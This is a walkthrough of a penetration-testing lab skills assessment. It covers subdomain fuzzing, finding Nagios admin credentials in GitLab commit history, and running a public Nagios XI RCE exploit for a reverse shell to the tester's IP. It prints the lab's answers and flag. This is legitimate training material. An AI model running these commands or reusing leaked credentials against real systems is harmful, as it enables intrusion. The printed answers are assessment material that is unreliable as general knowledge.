During an external penetration test for the company Inlanefreight, you come across a host that, at first glance, does not seem extremely interesting. At this point in the assessment, you have exhausted all options and hit several dead ends. Looking back through your enumeration notes, something catches your eye about this particular host. You also see a note that you don't recall about the gitlab.inlanefreight.local vhost.

Performing deeper and iterative enumeration reveals several serious flaws. Enumerate the target carefully and answer all the questions below to complete the second part of the skills assessment.

Questions:

What is the URL of the WordPress instance?

reconnaissance

Nmap scan

                                                                             
┌──(sasorirose㉿kazekageiii)-[~/…/HTB_Academy/Attacking_Common_Application/Skils_Assessments/part2]
└─$ sudo nmap -sV -sC 10.129.201.90
[sudo] password for sasorirose: 
Starting Nmap 7.95 ( https://nmap.org ) at 2026-05-05 07:11 UTC
Nmap scan report for gitlab.inlanefreight.local (10.129.201.90)
Host is up (0.25s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3f:4c:8f:10:f1:ae:be:cd:31:24:7c:a1:4e:ab:84:6d (RSA)
|   256 7b:30:37:67:50:b9:ad:91:c0:8f:f7:02:78:3b:7c:02 (ECDSA)
|_  256 88:9e:0e:07:fe:ca:d0:5c:60:ab:cf:10:99:cd:6c:a7 (ED25519)
25/tcp   open  smtp     Postfix smtpd
|_smtp-commands: skills2, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://gitlab.inlanefreight.local:8180/
|_http-server-header: Apache/2.4.41 (Ubuntu)
389/tcp  open  ldap     OpenLDAP 2.2.X - 2.3.X
443/tcp  open  ssl/http Apache httpd 2.4.41 ((Ubuntu))
| ssl-cert: Subject: commonName=10.129.201.90/organizationName=Nagios Enterprises/stateOrProvinceName=Minnesota/countryName=US
| Not valid before: 2021-09-02T01:49:48
|_Not valid after:  2031-08-31T01:49:48
| tls-alpn: 
|_  http/1.1
|_http-title:  Shipter\xE2\x80\x93Transport and Logistics HTML5 Template 
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.41 (Ubuntu)
8180/tcp open  http     nginx
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://gitlab.inlanefreight.local:8180/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
| http-robots.txt: 54 disallowed entries (15 shown)
| / /autocomplete/users /autocomplete/projects /search 
| /admin /profile /dashboard /users /help /s/ /-/profile /-/ide/ 
|_/*/new /*/edit /*/raw
Service Info: Host:  skills2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.03 seconds

im doing hackthebox academy lab
help me to analyze, sumary and write up ( first lets do anaylyze nmap scan and enumeration)

Enumerate for subdomain:

┌──(sasorirose㉿kazekageiii)-[~/…/HTB_Academy/Attacking_Common_Application/Skils_Assessments/part2]
└─$ ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://10.129.201.90/ -H "Host: FUZZ.inlanefreight.local" -fs 46166 -s
blog
monitoring
gitlab

you can run without:

-fs to filter some response with specific size

-s hide everything except the valid hits

Answer: http://blog.inlanefreight.local

What is the name of the public GitLab project?

After resgister and login with new credential and choose to public project:

Answer: Virtualhost

What is the FQDN of the third vhost?

Answer: monitoring.inlanefreight.local

What application is running on this third vhost? (One word)

After accessing to the monitoring.inlanefreight.local

Answer: Nagios

What is the admin password to access this application?

Get back to enumerate at gitlab instance and hunting for admin password

Enumerate for Nagios Postgresql database

And i found from the commits history

nagiosadmin:oilaKglm7M09@CPL&^lC

Let’s try to login with that credential

Answer: oilaKglm7M09@CPL&^lC

Obtain reverse shell access on the target and submit the contents of the flag.txt file.

Enumerate for Nagios, search for Nagios XI 5.7.X PoC and i found this https://www.exploit-db.com/exploits/49422

python3 nagiosxi-rce.py http://monitoring.inlanefreight.local nagiosadmin 'oilaKglm7M09@CPL&^lC' 10.10.14.29 4444

get reverse shell with exploit script

after do that, i think too complicated to get shell on the host with other user but we can find flag here

Answer: afe377683dce373ec2bf7eaf1e0107eb